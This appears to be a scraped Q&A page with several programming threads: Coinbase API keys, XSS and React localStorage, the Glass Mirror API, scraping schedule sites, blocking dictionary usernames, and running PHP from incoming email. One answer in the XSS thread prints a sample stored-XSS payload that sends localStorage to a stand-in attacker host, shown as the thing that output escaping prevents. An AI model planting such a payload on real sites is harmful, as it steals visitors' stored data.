Why is my Coinbase API key always set to disabled by default? - coinbase-api

I'm trying to explore the Coinbase API environment. The very first time, I accidentally enabled all of the scopes, so I removed that key and created a new one.
Now, every time I create a new key, it is put into a disabled state by default. This happens every time there is an update to a write scope. The read scopes seem to work for most resources (apart from trading-related scopes), but the transaction-related scopes fail for both read and write.
Is there any particular reason why this is happening on my account? The account isn't verified, by the way, but that doesn't stop me from using it, because I only need a few basic scopes, like reading my account's addresses and transferring funds to another Coinbase user, something like that. I will not use this for trading.
Any help would be gladly appreciated.

It's for security purposes, according to the response email I got from Coinbase.

By the way, the key will only remain disabled for the next 48 hours, for protection purposes. The solution is simply to wait out the 48 hours and then do everything you want to do.

Related

How can a hacker perform an XSS attack if he does not have access to the user's computer? [duplicate]

This question already has answers here:
What does it mean when they say React is XSS protected?
(2 answers)
Closed 2 years ago.
I am reading some articles about security in React applications. I use localStorage to store the user's info, and I've seen that an XSS attack could easily allow a hacker to steal it.
However, I understand that in React, an XSS attack can only be performed through a dangerouslySetInnerHTML prop that displays content written in an input. This way, you can steal the user's info, session cookies, etc. and send them to your own website.
But a hacker could only do this if he has the chance to write his script on the user's computer, right? So, if I don't use any dangerouslySetInnerHTML prop, is localStorage safe in a React app? If not, how could a hacker run such an attack on the website?
If the user uses a public computer it might be possible.
If you have some functionality that allows external users to post content on your site, for example comments or reactions, then someone might post a script which sends localStorage data to the attacker.
There are a lot of ways to exploit this; check OWASP for a more detailed explanation:
https://owasp.org/www-project-top-ten/
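As a generic illustration (regardless of framework), the root issue is rendering user-supplied content unescaped. A minimal PHP sketch of the defense, with a made-up malicious comment as the payload:
<?php
// Hypothetical stored comment, as an attacker might submit it: the onerror
// handler ships the visitor's localStorage off to the attacker's server.
$comment = '<img src=x onerror="fetch(\'https://evil.example/?d=\' + encodeURIComponent(JSON.stringify(localStorage)))">';

// Echoing $comment directly would run that script in every visitor's browser
// (stored XSS). Escaping it first renders it as inert text instead.
echo htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');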
Developers must accept what attackers can do:
They can retheme an entire site.
They can also write "bot" scripts to automate tasks, in other words flooding your server if that is the task.
All limits defined in JS/HTML can and will be bypassed (e.g. character lengths in forms).
The entire page can be rewritten so it no longer talks to your server correctly, in other words crashing it, and worse, if not handled/detected.
The list goes on, but accept that pretty much everything is off the table if someone wants to pry hard enough.
There's not a whole lot you can do to prevent this. To illustrate: you can add an external script from randomxyxsite.com, and even though it's trusted, that script could come under attack and now run loggers or some type of analytics-grabbing bot. In my opinion this is easily avoided by not adding external scripts if you can.
Though I said what I said originally, here's where you're stuck...
Any user can open the console, build extensions, or use a third-party loader like Tampermonkey and its alternatives to execute scripts at will. These scripts can also be "shared", becoming comparable to botnet behavior.
So what can you do to stop clients from misbehaving or "super-modding" their content for malicious use against your server?
Some ways to safeguard:
Server-side requests should pass through some form of check/sanitization to ensure that whatever any client passes to them is absolutely safe to absorb (see the sketch after this list).
Never let users tell you who they are beyond login; define them by session ID, know them by their session, and when one user interacts with another (user<>user), get between them and follow the above point.
Keep as much as possible private. Public variables/classes/functions are easily rewritten at run-time, leaving features you may have counted on to fall apart:
window.PayFeature = function(){};
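To illustrate the first safeguard above, here is a minimal PHP sketch of a server-side check; the endpoint, parameter name, and limits are all hypothetical:
<?php
session_start();

// Derive the user from the session, never from client-supplied identity.
$userId = $_SESSION['user_id'] ?? null;
if ($userId === null) {
    http_response_code(401);
    exit('Not logged in');
}

// Validate every client-supplied parameter before absorbing it.
$amount = filter_input(INPUT_POST, 'amount', FILTER_VALIDATE_INT);
if ($amount === false || $amount === null || $amount <= 0 || $amount > 10000) {
    http_response_code(400);
    exit('Invalid amount');
}

// Safe to act on $userId and $amount from here on.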
ALLOW XSS:
If feared, a developer should study it more. As much as users can distort/change their end, it only becomes an issue if the traffic changes or the data received from them starts looking like an attack. So as a developer, your best bet is to rate-limit, set rules, and so on for your users, so that abuse is detected and stopped. As long as you do that, you should never fear it but welcome it; once the server is secured, it becomes a matter of spam (a potential botnet).
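A minimal sketch of that rate-limiting idea, using a per-session counter (a real deployment would more likely use a shared store such as Redis or memcached; the limits here are arbitrary):
<?php
session_start();

// Allow at most 20 requests per 60-second window per session.
$now = time();
if (!isset($_SESSION['rl_start']) || $now - $_SESSION['rl_start'] > 60) {
    $_SESSION['rl_start'] = $now;
    $_SESSION['rl_count'] = 0;
}
if (++$_SESSION['rl_count'] > 20) {
    http_response_code(429);
    exit('Too many requests');
}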

Any recent changes in how contacts identify themselves to the Mirror API?

I'm concerned - when I take a picture, I usually (i.e., as of last week) am able to share the image to my app.
Now, however, only Google+ contacts appear as share targets. For example, if I turn off sharing to Google+, I get no Share options at all, only a greyed-out Share dialog that says "Visit google.com/myglass to add friends".
However, when I go to that address I clearly see my app and a number of contacts (who aren't on Google+) who also usually show up.
Has something changed to cause this behavior? For example, is the code listed in the starter-project no longer sufficient to register a share target for photos?
For example, I could imagine that the acceptTypes[] parameter has suddenly become mandatory. But I'd love to hear someone closer to the API weigh in, if possible.
Thanks!
AKA
I solved this by following the advice in Alain's comment.
It's very easy to think that the "Contacts" page you see at https://glass.google.com/myglass is all there is.
But if you want your app to receive shared stuff, you have to go here: https://glass.google.com/myglass/share

Need ideas on retrieving data from a website

I'm stumped and need some ideas on how to do this or even whether it can be done at all.
I have a client who would like to build a website tailored to English-speaking travelers in a specific country (Thailand, in this case). The different modes of transportation (bus & train) have good websites providing their respective information, and both are very static in terms of the data they present (the schedules rarely change). Here's one of the sites I would need to get info from: train schedules. The client wants to give users the ability to search for a beginning and end location and determine, using the external websites' information, how they can best get there, being given a route with schedule times for the different modes of transport chosen.
Now, in my limited experience, I would think the way to do that would be to retrieve the original schedule info from the external sites' servers (via an API or some other means) and retain it in a database, which can be queried as needed. Our first thought was to contact the respective authorities to determine how/if this can be done, but this has proven problematic, mainly due to the language barrier.
My client suggested what is basically "screen scraping", but that sounds like it would be complicated at best: downloading the web page(s) and filtering through the HTML for the relevant/necessary data to put into the database. My worry is that the info on these mostly static sites is so static that the data isn't even kept in a database to build the pages; the web pages themselves may simply be updated by hand (hard-coded) when something changes.
I could really use some help and suggestions here. Thanks!
Screen scraping is always problematic IMO, as you are at the mercy of whoever wrote the page. If the content is static, then I think it would be easier to copy the data manually into your database. If you want to keep up to date with changes, you could snapshot the page when you transcribe the info and run a job that periodically checks whether the page has changed from the snapshot. When it does, it sends you an email so you can update the data.
The above method could also be used in conjunction with some sort of screen scraper, which could fall back to a manual process if the page changes too drastically.
Ultimately, it is a question of how much effort (cost) your client is willing to bear for accuracy.
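A minimal PHP sketch of that snapshot-and-notify job, run from cron; the URL and email address are placeholders:
<?php
// Fetch the page and compare its hash against the stored snapshot; when it
// differs, email a human to re-transcribe the data and refresh the snapshot.
$url  = 'http://www.example.com/train-schedule'; // placeholder URL
$html = file_get_contents($url);
if ($html === false) {
    mail('me@example.com', 'Schedule page unreachable', "Could not fetch $url");
    exit(1);
}

$snapshotFile = __DIR__ . '/snapshot.sha1';
$previous = is_file($snapshotFile) ? trim(file_get_contents($snapshotFile)) : '';

if (sha1($html) !== $previous) {
    file_put_contents($snapshotFile, sha1($html));
    mail('me@example.com', 'Schedule page changed', "Check $url and update the database.");
}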
I have done this for the following site: http://www.buscatchers.com/, so it's definitely more than doable! A key feature of a web scraping solution for travel sites is that it must send you emails if anything goes wrong during the scraping process. On that site, I use a two-day window, so that I have two days to fix the code if the design changes. Only once or twice have I had to change my code, and it's very easy to do.
As for some examples: there is some simplified source code here: http://www.buscatchers.com/about/guide. The full source code for the project is here: https://github.com/nicodjimenez/bus_catchers. This should give you some ideas on how to get started.
I can tell that the data is dynamic; it's too well structured. It's not hard for someone who is familiar with XPath to scrape this site.
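For illustration, a minimal PHP sketch of XPath-based scraping; the URL and the table id are assumptions, so adjust the query to the real page structure:
<?php
// Load the remote page into a DOM tree; real-world HTML is rarely valid,
// so suppress libxml's parse warnings.
$url = 'http://www.example.com/train-schedule'; // placeholder URL
$doc = new DOMDocument();
libxml_use_internal_errors(true);
$doc->loadHTML(file_get_contents($url));
libxml_clear_errors();

// Pull each row out of a hypothetical schedule table.
$xpath = new DOMXPath($doc);
foreach ($xpath->query('//table[@id="schedule"]//tr') as $row) {
    $cells = [];
    foreach ($xpath->query('.//td', $row) as $cell) {
        $cells[] = trim($cell->textContent);
    }
    if ($cells) {
        print_r($cells); // e.g. [origin, destination, departure time] - insert into the DB here
    }
}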

Preventing dictionary user names for registration

When I was setting up an account with Gmail a few years back (this is probably still the case, I haven't checked), I noticed that the system doesn't allow you to register common terms or nouns as a username; it seemed to use a sort of dictionary for screening. I would like to implement a similar feature in my app. Does anyone have an idea how to tackle this? The app is written in PHP, but I understand I'll have to hook it up with an online service.
Thanks
WordPress MU has such a feature too: you fill in a list of usernames that you want to avoid, and they become unavailable to users. You can check its source to see their approach...
Sinan.
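A minimal sketch of that approach in PHP, assuming a plain-text wordlist with one word per line (many Unix systems ship one at /usr/share/dict/words):
<?php
// Returns true if the requested username is a plain dictionary word.
function isDictionaryWord(string $username, string $dictFile = '/usr/share/dict/words'): bool
{
    $needle = strtolower(trim($username));
    foreach (file($dictFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $word) {
        if (strtolower($word) === $needle) {
            return true;
        }
    }
    return false;
}

// Usage during registration (the field name is hypothetical):
if (isDictionaryWord($_POST['username'] ?? '')) {
    exit('That username is too common; please choose another.');
}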
Well, the API will vary from service to service, so I'd suggest you find one, look at their developer docs, and then, if you have a question, ask it here.

How to control a web application through email? Or how to run a PHP script by sending an email?

I want to run a web application on PHP and MySQL, using the CakePHP framework. And to keep the threshold for using the site very low, I don't want to use the standard login with username/password. (And I don't want to hassle my users with something like OpenID either. It goes to user type.)
So I'm thinking that users should be able to log in by sending an email to login@domain.com, with no subject or content required. In reply, they will get an email with a link that will log them in (it will contain a hash). I will also let users perform some actions without even visiting the site at all: they just send an email to command@domain.com and the command is carried out. I will assume that users and their email providers take care of their email account security, and as such there is no need for it on my site.
Now, how do I go from an email being sent to an account that is not read by humans, to some script being fired off (basically a "dummy browser client" calls a URL, and CakePHP will take care of the rest)?
I have never used a cron job before, but I do think I understand their purpose and how they generally work. I cannot have the script called by random people visiting the site, as that solution won't work for several reasons. I would like to hear more about the possibility of having the script run in response to an incoming email, if anyone has any input on that. If it's run as a cron job, it would only check every X minutes, and users would see a lag in the response (if I understand it correctly).
Since there will be different email addresses for different commands, like login@domain.com, and I know what to do and how to do it based on the sender's email address, I don't even need the content, subject, or any other headers from the email.
There is a lot of worry about the security of this application. I understand the issues, but without giving away my concept, I don't think it is a big issue for what I am doing. As for usability, there really isn't an issue: it's just going to be login, providing changes to a user's profile if/when they need that, and one other command. And this is the main email address, which is very easy to remember, and the starting point of this whole concept.
I have used the pop3 PHP class with great success (there is also a PEAR POP3 module).
Using the pop3 class looks something like this:
require('pop3.php');

$pop3 = new pop3_class();
$pop3->hostname = MAILHOST;

// Connect to the POP3 server and authenticate.
$pop3->Open();
$pop3->Login('myemailaddress@mydomain.com', 'mypassword');

// Walk through every message currently in the mailbox.
foreach ($pop3->ListMessages("", "") as $msgidx => $msgsize) {
    $headers = "";
    $body = "";
    $pop3->RetrieveMessage($msgidx, $headers, $body, -1);
}
I use it to monitor a POP3 mailbox which feeds into a database.
It gets called by a cron job which uses wget to call the URL of my PHP script:
*/5 * * * * wget -q --http-user=me --http-passwd=pass 'http://mydomain.com/mail.php' >> /dev/null 2>&1
Edit
I've been thinking about your need to have users send certain site commands by email.
Wouldn't it be easier to have a single address that multiple commands can be sent to rather than having multiple addresses?
I think the security concerns are pretty valid too. Unless the commands are non-destructive or aren't doing anything user-specific, the system will be wide open to anyone who knows how to spoof an email address (which would be everyone :) ).
You'll need some sort of cron job/timer service that checks the mailbox regularly and then acts on it. Alternatively, check whether the mail server can run a script when a mail arrives (i.e. see if it's possible to plug in a spam-filter-style script and "abuse" that mechanism to call your script instead).
With pure PHP, you're mostly out of luck, as something needs to trigger the script. On a page with a LOT of traffic, you could have your index.php or whatever do the check, but when no one visits your site for quite some time, the mail will not be processed; and you have to be careful of "race conditions" when multiple people access the script at the same time.
Edit: Just keep one usability flaw in mind: people with multiple PCs and without an email client on every one. For example, I use 4 PCs, but only 1 (my main one) has a mail client installed, and I use webmail to check the others. Now, logging in and sending a mail through webmail is not the greatest usability: in order to use YOUR site, I first have to log in to ANOTHER site, compose a mail through the crappy interface most webmail tools have, and wait for the answer. I could just as well use OpenID there :-)
If your server allows it, you can use a .forward file or procmail to start a process (PHP or anything else) when a mail arrives at a certain address.
You don't want to hassle users with OpenID, but you do want them to deal with this email scheme. Firstly, email can take a long time to go through; there is no guaranteed delivery time, and it's not even guaranteed that the email will arrive at all. I know things are usually quick, but it's not uncommon for a round trip to take up to 10 minutes. Also, unless you're encrypting the email, the link you send back travels in the open, which means anybody who can read the traffic can use that link to log in. Depending on how secure you want to be, this may or may not be an issue, but it's definitely something to think about. Using a non-standard login method like this is going to be a lot more work than it is probably worth, and I can't really see any advantages to the whole process.
I was also thinking of using procmail to start some script. There is also formail, which might come in handy to change or extract headers. If you have admin access to the mail server, you could also use /etc/aliases and just pipe to your script.
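For example, an /etc/aliases entry that pipes mail for login@domain.com into a handler script could look like this (the script path is a placeholder; run newaliases after editing):
login: "|/usr/bin/php /path/to/handle_login.php"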
Besides the usability issues, you should really think about security: it's actually quite simple to send email with a fake sender address, so I would not rely on it for anything critical.
I agree with all the security concerns. Your assumption that "the users and their email providers takes care of their email account security" is not correct when it comes to the sender's e-mail address.
But since you specifically asked "how do I go from an email is sent to an account that is not read by humans to there being fired off some script", I recommend using procmail to deliver the incoming e-mail to a script you write.
I would not call a URL. I would have the script perform the work by reading the message sent in on stdin. That way, the script is not accessible to anyone on the web site.
To set this up, the e-mail address you provide to your users will have to be associated with a real user on the system. In that user's home directory, create a file called ".procmailrc".
In that file, add these two lines:
:0 hb:
| /path/to/program
where /path/to/program is the full path to the script or program for handling the incoming message. Then create the script with code something like this:
#!/usr/bin/php
<?php
// procmail pipes the message headers and body to this script on stdin.
$fp = fopen('php://stdin', 'r');
while (($line = fgets($fp)) !== false) {
    // [do something with each $line of input here]
}
fclose($fp);
?>
The e-mail message will not remain in the mailbox, so if you want to save or log it, have the script do it.
--
Bruce
I would seriously reconsider this approach. E-mail doesn't have very high reliability: there are all kinds of spam filters that might intercept e-mails with links, thereby leaving the "command" half-finished, not to mention the security risks.
It's very easy to spoof the sender address of an e-mail. You are basically opening up your system to anyone.
Also, instead of a username/password combination, you're suddenly requiring users to remember a list of commands to put in front of an email address. It would be better to provide them with a username/password and then give them access to a help page.
In other words, the usability and security of this scheme score very low.
I can't really find any advantages to this approach that even come close to outweighing the massive disadvantages.
One way to prevent spam: make sure the first line, the last line, or a specific line contains a certain string, almost like a password; a full sentence is even better.
Only you have the word or words, so it's pretty secure; just remember to delete the mails after use, as well as those that do not have the secret line.
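A minimal sketch of that check, which could sit at the top of the stdin-reading script shown earlier (the secret sentence is of course a placeholder):
<?php
// Read the whole message from stdin and ignore it unless it contains the
// shared secret sentence somewhere in the body.
$secret  = 'the quick brown fox approves this command';
$message = stream_get_contents(fopen('php://stdin', 'r'));

if (strpos($message, $secret) === false) {
    exit(0); // no secret line: silently discard the mail
}
// ...safe to parse and act on the command from here...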
Apart from the security and usability concerns, email delivery itself can be another problem. Depending on the user's email provider, delivery can be delayed by anywhere from a few minutes to a few hours.
There is a really nice educational story on thedailywtf.com about designing software. The posed question should be solved by proper design, not by techno-woopla.
Alexander, please read the linked story and think gloves, not email-driven webpage browsing.
PHP is not a hammer.

Resources